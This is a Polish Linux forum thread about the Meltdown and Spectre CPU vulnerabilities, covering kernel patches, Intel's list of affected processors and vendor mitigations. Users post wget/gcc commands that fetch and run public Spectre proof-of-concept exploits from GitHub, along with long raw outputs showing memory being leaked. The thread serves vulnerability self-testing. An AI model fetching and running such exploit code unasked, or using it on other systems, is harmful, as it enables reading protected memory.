Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!
Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.
Yossarian masz krótką pamięć. AMD jest określane jako królowie slajdów. Opinia ciągnie się od lat. Tak samo jak powiedzenie, że to kupowanie na przyszłość. Potem czekanie na sterowniki.
Poza tym proponuje sobie przypomnieć co się działo kiedy kilka redakcji przetestowało produkty serii Polaris. Raz dystrybutor wysyłał instrukcje jak mają być testowane, a dwa jak im się testy nie spodobały to kilka redakcji przestało dostawać sample.
@morfik
To się nie dorobiłeś Lenovo ZUK 2?
Offline
Przyczepiłeś się do jakichś testów wydajności w grach, a to jest zwykła dziecinada.
Są ważniejsze sprawy, żeby daleko nie szukać — bezpieczeństwo.
EOT
Offline
Z tym bezpieczeństwem w AMD to poczekajmy. Bo różne kwiatki mogą jeszcze wypłynąć.
Większość ludzi wykorzystuje komputery do szeroko pojętej rozrywki. Więc ich Debian, bezpieczeństwo, Intel czy hasło odporne na atak słownikowy mało obchodzi.
Do Intela można mieć żal, że dopuścił się zaniedbania pomimo znakomitej kadry inżynierskiej. Dodatkowo świadczy to o tym, że czasy cudownych dzieciaków z garażu skończyły się, a sami hackerzy (jak i crackerzy) również nie wykazali się tym temacie (przynajmniej oficjalnie) przez wiele lat.
Ostatnio edytowany przez ciastek1981 (2018-01-05 18:51:10)
Offline
[quote=ciastek1981]To się nie dorobiłeś Lenovo ZUK 2?[/quote]
W sumie nie wiem co to za fon. Tak tylko wrzuciłem w gógla i on nie jest jakoś specjalnie wybitny. To o ten chodzi?
http://www.mgsm.pl/pl/katalog/zuk/z2pro/
No ma 64G/4G Flash/RAM ale za 1,1K + vat to nie jest mało. Ten mój fon ma 32G/3G i kosztuje 700 zeta z vat. Ma też wersję 64G/4G za chyba coś koło 900 z vat. Także wychodzi lepiej, no tylko ten mój ma 8 rdzeni w stosunku do tego twojego co ma ich 4. xD Pozostałe rzeczy wypadają podobnie z lekką przewagą dla Lenovo ZUK 2 ale nieznacznie. Poza tym to Qualcomm vs Mediatek, choć ja lubię Qualcomm (bo też lubi linux'iarzy), to mimo wszystko preferuję Mediateka na smartfonach bo o wiele trudniej jest go uwalić bawiąc się nim w root i alternatywne ROM'y. No i najważniejsze, z tego co wyczytałem to ten Lenovo ZUK 2 ma andka 5.1 lub 6.0. Ten mój ma 7.0 i po testach tych systemów mogę ci powiedzieć, że jest duża różnica w 7.0 w stosunku do tych poprzednich i ja bym poniżej 7.0 nie schodził już. xD No i drugie najważniejsze, Lenovo ZUK 2 też nie jest wspierany przez LineageOS oficjalnie, [url=https://forum.xda-developers.com/zuk-z2-pro/development/lineageos-14-1-20171018-t3690721]choć tutaj jakieś prace są pod tym kątem[/url].
Co do tych alternatywnych ROM'ów jeszcze, to producenci często wiążą wgranie takiego ROM'u (albo też samo odblokowanie bootloader'a) z utratą gwarancji na sprzęt. To też wnerwia, bo niby można by samemu te wszystkie podatności załatać ale traci się gwarancję. Niby EU coś w tej sprawie robi ale dopchać się do tych sądów europejskich zajmie wieki. xD
[quote=ciastek1981]Z tym bezpieczeństwem w AMD to poczekajmy. Bo różne kwiatki mogą jeszcze wypłynąć.[/quote]
No pewnie, żę może. Powiem więcej, na pewno tego doświadczymy kiedyś w przyszłości i to nie tylko w stosunku do AMD. Kiedyś był [url=https://niebezpiecznik.pl/post/konkurs-bezpieczenstwo-rozwiazan-open-source/]konkurs na niebezpieczniku[/url] i nawet byłem wśród laureatów. xD I nadal podtrzymuję swoje zdanie, które napisał tam w komenatrzu (jako zgłoszenie do konkursu). Przeczytaj sobie, bo ja wciąż się pospisuję wszystkimi przyciskami mojej klawiatury (a nawet i myszy) pod tym co wtedy napisałem. xD
Ostatnio edytowany przez morfik (2018-01-05 20:05:51)
Offline
[i]Informacja usunięta ponieważ była już podawana w tym wątku. Poza tym to jest tylko załatanie jednej podatności zgłoszonej w związku z tym tematem.
Reszta jest niezałatana.[/i]
Ostatnio edytowany przez davidoski (2018-01-05 21:21:37)
Offline
@davidoski, informacja była już podawana w tym wątku.
Poza tym to jest tylko załatanie jednej podatności zgłoszonej w związku z tym tematem.
Reszta jest niezałatana.
Offline
@morfik
Niektóre ZUK'i miały Cyanogen 14.1 (tak to zapamiętałem) . Przynajmniej tak było napisane w specyfikacji w chińskich sklepach. Teraz strona ZUK przekierowuje na stronę Motoroli więc nie sprawdzę które dokładnie.
W polskim necie pisali http://gadzet.telchina.pl/lenovo-zuk-bez-cyanogen-os/
Ostatnio edytowany przez ciastek1981 (2018-01-06 08:47:58)
Offline
Dzisiaj w oficjalnym jądrze liquorix (ciastek1981 podawał linki do nieoficjalnych kompilacji) pojawiła się aktywna łatka na meltdown.
cat /boot/config-4.14.0-12.1-liquorix-amd64 | grep -i CONFIG_PAGE_TABLE_ISOLATION CONFIG_PAGE_TABLE_ISOLATION=y
Ostatnio edytowany przez arecki (2018-01-06 09:34:33)
Offline
[quote=arecki]Dzisiaj w oficjalnym jądrze liquorix (ciastek1981 podawał linki do nieoficjalnych kompilacji) pojawiła się aktywna łatka na meltdown.[/quote]
Jeżeli już to podawałem do kompilacji z OFICJALNEGO forum Liquorix https://techpatterns.com/forums/forum-34.html , a nie wersji z OFICJALNEJ strony.
Offline
Co z tego, że oficjalne forum. To niczego nie zmienia.
Offline
Ktoś podpiął ten temat na górze oficjalnego forum, więc wersja jakby oficjalna. Tylko zaciągana stąd
https://software.opensuse.org/download.html?project=home%3Astevenpusser%3Acodelite&package=liquorix
Offline
@ciastek1981 szkoda bić pianę, ale przeczytaj najpierw ze zrozumieniem co tam piszą i dla kogo jest ten kernel.
W temacie Meltdown: gałąź sid została oznaczona jako fixed z jądrem w wersji 4.14.12-1
Na razie nie widzę go w repozytoriach.
Offline
Jeszcze to nam uciekło jeżeli chodzi o Intela. Poprawka znacząco [b]nie wpływa[/b] na procesory z PCID (Process-Context Identifiers) czyli od mikroarchitektury [url=https://en.wikipedia.org/wiki/Westmere_(microarchitecture)]Westmere[/url] - [b]część[/b], oraz [b]wszystkie[/b] od [url=https://en.wikipedia.org/wiki/Haswell_(microarchitecture)]Haswell[/url]
It was reported that implementation of KPTI may lead to a reduction in CPU performance, with some researchers claiming up to 30% loss in performance, depending on usage, though Intel considered this to be an exaggeration.[54] It was reported that Intel processor generations that support process-context identifiers (PCID), a feature introduced with Westmere[55] and available on all chips from the Haswell architecture onward, were not as susceptible to performance losses under KPTI as older generations that lack it.[56][57][/quote]
[url=https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)#Mitigation]https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)#Mitigation[/url]
https://www.realworldtech.com/westmere/Ostatnio edytowany przez ciastek1981 (2018-01-07 00:56:33)
Burble, Burble, Burble ... hahaaaaaaa :D
Forum Linux Mint Polska http://forum.linuxmint.pl/
Offline
Cześć. [b]zl23[/b] pytałeś o listę procesorów z w/w błędem. Na stronie [b]Project Zero[/b] w artykule dot. tego zagadnienia, znajduje się m.in. lista procesorów, na których działają PoC (np. [i]Intel Haswell Xeon CPU[/i], [i]AMD FX CPU[/i] etc.) oraz tych przetestowanych (np. [i]Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz[/i], [i]AMD FX(tm)-8320 Eight-Core Processor [/i] etc.) Więcej informacji: "[url=https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html][color=blue]Reading privileged memory with a side-channel[/color][/url]"
Warto wspomnieć, że w odpowiedzi na wykryte luki, Google opracowało technikę [i]Retpoline[/i] — stosującą modyfikację binarną, która chroni przed atakami typu "[i]branch target injection[/i]" (zob. "[url=https://security.googleblog.com/2018/01/more-details-about-mitigations-for-cpu_4.html][color=blue]More details about mitigations for the CPU Speculative Execution issue[/color][/url]") [i]Retpoline[/i] został przedstawiony partnerom branżowym i wdrożony w systemach Google. Ponadto zastosowano tzw. [tt]kernel page-table isolation (KPTI)[/tt] — technika przeznaczona do lepszej ochrony poufnych informacji, znajdujących się w pamięci, przed innym oprogramowaniem uruchomionym na komputerze. [tt]KPTI[/tt] zastosowano na serwerach produkcyjnych Linuksa, które obsługują najważniejsze usługi Google, w tym wyszukiwarkę, Gmail, YouTube etc.
Również Firefox m.in. w wersji [tt]v57.0.4[/tt] zastosował częściowe, krótkotrwałe poprawki bezpieczeństwa mające na celu zapobieganie atakom "[i]Meltdown[/i]" oraz "[i]Spectre[/i]". Poprawki przewidziane dla wersji [tt]v52.6 ESR[/tt], która jest mniej podatna, ponieważ m.in. nie wspiera [tt]SharedArrayBuffer[/tt], zaplanowano na 23. Stycznia 2018 roku. Pełny zakres tej klasy ataków jest nadal badany. W dalszej perspektywie zaczęto eksperymentować z różnymi technikami, ponieważ ten problem wymaga czasu na zrozumienie, testowanie i wdrożenie łatek etc. (zob. [url=https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/][color=blue]"Mitigations landing for new class of timing attack"[/color][/url]).
Pozdrawiam.
[color=gray]EDYCJA: złe zastosowanie znaczników dot. formatowania tekstu.[/color]
Ostatnio edytowany przez remi (2018-01-07 15:34:50)
Offline
Łatka w kernelu jest tylko na Meltdown.
Sprawdzenie podatności na Spectre:
wget https://raw.githubusercontent.com/Eugnis/spectre-attack/master/Source.c gcc Source.c ./a.out
Offline
To dostaję w wyniku:
Putting 'The Magic Words are Squeamish Ossifrage.' in memory Reading 40 bytes: Błędna instrukcja
Nie wiem jak to zinterpretować.
Offline
A jaki masz procek, system i kernel?
U mnie na Stable wciąż ta podatność działa.
Offline
Mam łatkę na Meltdown
$uname -a Linux user 4.14.0-12.1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 4.14-15 (2018-01-06) x86_64 GNU/Linux $cat /etc/debian_version buster/sid $cat /proc/cpuinfo | grep 'model name' | uniq model name : Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz
Jeśli dobrze rozumiem mam procesor pierwszej generacji Intel Core.
Zgodnie z tym co obecnie publikuje Intel pod adresem https://www.intel.com/content/www/us/en/architecture-and-technology/facts-about-side-channel-analysis-and-intel-products.html#faq-more-answers-11
nie widzę mojego procesora, więc chyba nie jest podatny, ale ciężko mi w to uwierzyć.
Which Intel-based platforms are affected by or vulnerable to the issue?
The following Intel-based platforms are impacted by this issue. Intel may modify this list at a later time.
Please check with your system vendor or equipment manufacturer for more information regarding your system.
Intel® Core™ i3 processor (45nm and 32nm)
Intel® Core™ i5 processor (45nm and 32nm)
Intel® Core™ i7 processor (45nm and 32nm)
Intel® Core™ M processor family (45nm and 32nm)
2nd generation Intel® Core™ processors
3rd generation Intel® Core™ processors
4th generation Intel® Core™ processors
5th generation Intel® Core™ processors
6th generation Intel® Core™ processors
7th generation Intel® Core™ processors
8th generation Intel® Core™ processors
Intel® Core™ X-series Processor Family for Intel® X99 platforms
Intel® Core™ X-series Processor Family for Intel® X299 platforms
Intel® Xeon® processor 3400 series
Intel® Xeon® processor 3600 series
Intel® Xeon® processor 5500 series
Intel® Xeon® processor 5600 series
Intel® Xeon® processor 6500 series
Intel® Xeon® processor 7500 series
Intel® Xeon® Processor E3 Family
Intel® Xeon® Processor E3 v2 Family
Intel® Xeon® Processor E3 v3 Family
Intel® Xeon® Processor E3 v4 Family
Intel® Xeon® Processor E3 v5 Family
Intel® Xeon® Processor E3 v6 Family
Intel® Xeon® Processor E5 Family
Intel® Xeon® Processor E5 v2 Family
Intel® Xeon® Processor E5 v3 Family
Intel® Xeon® Processor E5 v4 Family
Intel® Xeon® Processor E7 Family
Intel® Xeon® Processor E7 v2 Family
Intel® Xeon® Processor E7 v3 Family
Intel® Xeon® Processor E7 v4 Family
Intel® Xeon® Processor Scalable Family
Intel® Xeon Phi™ Processor 3200, 5200, 7200 Series
Intel Atom® Processor C Series
Intel Atom® Processor E Series
Intel Atom® Processor A Series
Intel Atom® Processor x3 Series
Intel Atom® Processor Z Series
Intel® Celeron® Processor J Series
Intel® Celeron® Processor N Series
Intel® Pentium® Processor J Series
Intel® Pentium® Processor N Series[/quote]
[quote=seler]U mnie na Stable wciąż ta podatność działa.[/quote]
Podaj jaki powinien być wynik w przypadku podatności.
Odnośnie Meltdown, z tego co piszą procesory AMD nie są podatne.
Co innego Spectre, tu nawet najnowsze Razen są podatne.
Jak informują badacze atak Spectre jest o wiele trudniejszy, ale i załatane tej podatności jest trudniejsze.
Zastanawia mnie jeszcze jedna rzecz: jeśli podatność dotyczy również procesorów stosowanych w węzłach sieci: czyli wszelkiego rodzaju routery, inteligentne switche itp. to może to być potencjalna hekatomba dla obecnego świata IT.Ostatnio edytowany przez arecki (2018-01-07 20:10:11)
Offline
Tak wygląda podatność na Spectre:
./a.out Putting 'The Magic Words are Squeamish Ossifrage.' in memory Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfed88... Success: 0x54='T' score=2 Reading at malicious_x = 0xffffffffffdfed89... Success: 0x68='h' score=2 Reading at malicious_x = 0xffffffffffdfed8a... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfed8b... Success: 0x20=' ' score=2 Reading at malicious_x = 0xffffffffffdfed8c... Success: 0x4D='M' score=2 Reading at malicious_x = 0xffffffffffdfed8d... Success: 0x61='a' score=2 Reading at malicious_x = 0xffffffffffdfed8e... Success: 0x67='g' score=2 Reading at malicious_x = 0xffffffffffdfed8f... Success: 0x69='i' score=2 Reading at malicious_x = 0xffffffffffdfed90... Success: 0x63='c' score=2 Reading at malicious_x = 0xffffffffffdfed91... Success: 0x20=' ' score=7 (second best: 0x21='!' score=1) Reading at malicious_x = 0xffffffffffdfed92... Success: 0x57='W' score=2 Reading at malicious_x = 0xffffffffffdfed93... Success: 0x6F='o' score=2 Reading at malicious_x = 0xffffffffffdfed94... Success: 0x72='r' score=9 (second best: 0x05='?' score=2) Reading at malicious_x = 0xffffffffffdfed95... Success: 0x64='d' score=2 Reading at malicious_x = 0xffffffffffdfed96... Success: 0x73='s' score=2 Reading at malicious_x = 0xffffffffffdfed97... Success: 0x20=' ' score=2 Reading at malicious_x = 0xffffffffffdfed98... Success: 0x61='a' score=2 Reading at malicious_x = 0xffffffffffdfed99... Success: 0x72='r' score=45 (second best: 0x05='?' score=20) Reading at malicious_x = 0xffffffffffdfed9a... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfed9b... Success: 0x20=' ' score=2 Reading at malicious_x = 0xffffffffffdfed9c... Success: 0x53='S' score=2 Reading at malicious_x = 0xffffffffffdfed9d... Success: 0x71='q' score=2 Reading at malicious_x = 0xffffffffffdfed9e... Success: 0x75='u' score=2 Reading at malicious_x = 0xffffffffffdfed9f... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfeda0... Success: 0x61='a' score=2 Reading at malicious_x = 0xffffffffffdfeda1... Success: 0x6D='m' score=2 Reading at malicious_x = 0xffffffffffdfeda2... Success: 0x69='i' score=2 Reading at malicious_x = 0xffffffffffdfeda3... Success: 0x73='s' score=2 Reading at malicious_x = 0xffffffffffdfeda4... Success: 0x68='h' score=2 Reading at malicious_x = 0xffffffffffdfeda5... Success: 0x20=' ' score=2 Reading at malicious_x = 0xffffffffffdfeda6... Success: 0x4F='O' score=2 Reading at malicious_x = 0xffffffffffdfeda7... Success: 0x73='s' score=7 (second best: 0x09='?' score=1) Reading at malicious_x = 0xffffffffffdfeda8... Success: 0x73='s' score=2 Reading at malicious_x = 0xffffffffffdfeda9... Success: 0x69='i' score=2 Reading at malicious_x = 0xffffffffffdfedaa... Success: 0x66='f' score=2 Reading at malicious_x = 0xffffffffffdfedab... Success: 0x72='r' score=2 Reading at malicious_x = 0xffffffffffdfedac... Success: 0x61='a' score=2 Reading at malicious_x = 0xffffffffffdfedad... Success: 0x67='g' score=2 Reading at malicious_x = 0xffffffffffdfedae... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfedaf... Success: 0x2E='.' score=2
Szczegóły tutaj: https://github.com/Eugnis/spectre-attack
Mam kernel 4.14.11 z patchami Debiana.
Edit:
Na debianowskim 4.14.12 bez zmian.
Edit2:
Inny tester na Spectre: https://github.com/Pl4gue/spectre-attack-demo
wget https://raw.githubusercontent.com/Pl4gue/spectre-attack-demo/master/spectre.c wget https://raw.githubusercontent.com/Pl4gue/spectre-attack-demo/master/spectre gcc -o spectre spectre.c ./spectre
Tak wygląda podatność, na podglądowym obrazku zaznaczone co istotne: https://raw.githubusercontent.com/Pl4gue/spectre-attack-demo/master/Spectre_Xeonv3_ubuntuXenial.jpeg
U mnie zaś tak:
./spectre Reading 100 bytes: Reading at malicious_x = 0xffffffffffdfed18... Success: 0x54=’T’ score=45 (second best: 0x05 score=20) Reading at malicious_x = 0xffffffffffdfed19... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfed1a... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed1b... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed1c... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed1d... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed1e... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed1f... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed20... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed21... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfed22... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfed23... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed24... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed25... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed26... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed27... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfed28... Success: 0x70=’p’ score=2 Reading at malicious_x = 0xffffffffffdfed29... Success: 0x6C=’l’ score=2 Reading at malicious_x = 0xffffffffffdfed2a... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed2b... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed2c... Success: 0x73=’s’ score=7 Reading at malicious_x = 0xffffffffffdfed2d... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed2e... Success: 0x6E=’n’ score=2 Reading at malicious_x = 0xffffffffffdfed2f... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed30... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed31... Success: 0x74=’t’ score=2 Reading at malicious_x = 0xffffffffffdfed32... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed33... Success: 0x76=’v’ score=2 Reading at malicious_x = 0xffffffffffdfed34... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed35... Success: 0x20=’ ’ score=7 (second best: 0x21 score=1) Reading at malicious_x = 0xffffffffffdfed36... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed37... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed38... Success: 0x74=’t’ score=2 Reading at malicious_x = 0xffffffffffdfed39... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed3a... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed3b... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed3c... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed3d... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed3e... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed3f... Success: 0x00=’?’ score=2 Reading at malicious_x = 0xffffffffffdfed40... Success: 0x54=’T’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed41... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfed42... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed43... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed44... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed45... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed46... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed47... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed48... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed49... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfed4a... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfed4b... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed4c... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed4d... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfed4e... Success: 0x74=’t’ score=2 Reading at malicious_x = 0xffffffffffdfed4f... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfed50... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed51... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffffffffffdfed52... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed53... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed54... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed55... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfed56... Success: 0x70=’p’ score=2 Reading at malicious_x = 0xffffffffffdfed57... Success: 0x6C=’l’ score=2 Reading at malicious_x = 0xffffffffffdfed58... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed59... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed5a... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed5b... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed5c... Success: 0x6E=’n’ score=2 Reading at malicious_x = 0xffffffffffdfed5d... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed5e... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed5f... Success: 0x74=’t’ score=2 Reading at malicious_x = 0xffffffffffdfed60... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed61... Success: 0x76=’v’ score=2 Reading at malicious_x = 0xffffffffffdfed62... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed63... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed64... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed65... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed66... Success: 0x74=’t’ score=2 Reading at malicious_x = 0xffffffffffdfed67... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed68... Success: 0x00=’?’ score=3 Reading at malicious_x = 0xffffffffffdfed69... Success: 0x25=’%’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed6a... Success: 0x70=’p’ score=2 Reading at malicious_x = 0xffffffffffdfed6b... Success: 0x00=’?’ score=3 Reading at malicious_x = 0xffffffffffdfed6c... Success: 0x25=’%’ score=2 Reading at malicious_x = 0xffffffffffdfed6d... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed6e... Success: 0x00=’?’ score=3 Reading at malicious_x = 0xffffffffffdfed6f... Success: 0x52=’R’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed70... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfed71... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed72... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed73... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed74... Success: 0x6E=’n’ score=2 Reading at malicious_x = 0xffffffffffdfed75... Success: 0x67=’g’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed76... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed77... Success: 0x25=’%’ score=2 Reading at malicious_x = 0xffffffffffdfed78... Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfed79... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed7a... Success: 0x62=’b’ score=2 Reading at malicious_x = 0xffffffffffdfed7b... Success: 0x79=’y’ score=2
Co do samej łatki na Meltdown to nie zauważyłam spadku wydajności w normalnej pracy, ale w mojej ulubionej grze już tak. Działała na maksymalnych detalach bez łatki, a po załataniu rwie. Muszę się przełączać na stary kernel, żeby pograć.
Ostatnio edytowany przez Renia (2018-01-08 05:04:07)
Offline
A u mnie wyszło tak:
$ uname -a Linux morfikownia 4.14.0-3-amd64 #1 SMP Debian 4.14.12-2 (2018-01-06) x86_64 GNU/Linux
$ ./a.out Putting 'The Magic Words are Squeamish Ossifrage.' in memory Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfed88... Success: 0x54='T' score=2 Reading at malicious_x = 0xffffffffffdfed89... Unclear: 0x05='?' score=5 (second best: 0x68='h' score=4) Reading at malicious_x = 0xffffffffffdfed8a... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfed8b... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed8c... Success: 0x05='?' score=5 (second best: 0x4D='M' score=2) Reading at malicious_x = 0xffffffffffdfed8d... Unclear: 0xDE='?' score=1 (second best: 0x05='?' score=1) Reading at malicious_x = 0xffffffffffdfed8e... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed8f... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed90... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed91... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed92... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed93... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed94... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed95... Unclear: 0x64='d' score=6 (second best: 0x05='?' score=5) Reading at malicious_x = 0xffffffffffdfed96... Success: 0x73='s' score=10 (second best: 0x05='?' score=4) Reading at malicious_x = 0xffffffffffdfed97... Success: 0x20=' ' score=2 Reading at malicious_x = 0xffffffffffdfed98... Success: 0x61='a' score=8 (second best: 0x05='?' score=4) Reading at malicious_x = 0xffffffffffdfed99... Unclear: 0x05='?' score=8 (second best: 0x72='r' score=7) Reading at malicious_x = 0xffffffffffdfed9a... Unclear: 0x65='e' score=4 (second best: 0x05='?' score=4) Reading at malicious_x = 0xffffffffffdfed9b... Unclear: 0x05='?' score=6 (second best: 0x20=' ' score=4) Reading at malicious_x = 0xffffffffffdfed9c... Unclear: 0x05='?' score=7 (second best: 0x53='S' score=5) Reading at malicious_x = 0xffffffffffdfed9d... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed9e... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfed9f... Success: 0x65='e' score=2 Reading at malicious_x = 0xffffffffffdfeda0... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda1... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda2... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda3... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda4... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda5... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda6... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda7... Success: 0x05='?' score=5 (second best: 0x73='s' score=1) Reading at malicious_x = 0xffffffffffdfeda8... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfeda9... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfedaa... Success: 0x05='?' score=2 (second best: 0x66='f' score=1) Reading at malicious_x = 0xffffffffffdfedab... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfedac... Success: 0x05='?' score=2 Reading at malicious_x = 0xffffffffffdfedad... Success: 0x05='?' score=2 (second best: 0xDE='?' score=1) Reading at malicious_x = 0xffffffffffdfedae... Success: 0x05='?' score=7 (second best: 0x65='e' score=1) Reading at malicious_x = 0xffffffffffdfedaf... Success: 0x05='?' score=2
$ ./spectre Reading 100 bytes: Reading at malicious_x = 0xffffffffffdfed18... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffffffffffdfed19... Unclear: 0xDE=’?’ score=1 (second best: 0x68 score=1) Reading at malicious_x = 0xffffffffffdfed1a... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed1b... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed1c... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed1d... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed1e... Success: 0x73=’s’ score=2 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfed1f... Success: 0x20=’ ’ score=1 Reading at malicious_x = 0xffffffffffdfed20... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed21... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed22... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfed23... Success: 0xFF=’?’ score=0 Reading at malicious_x 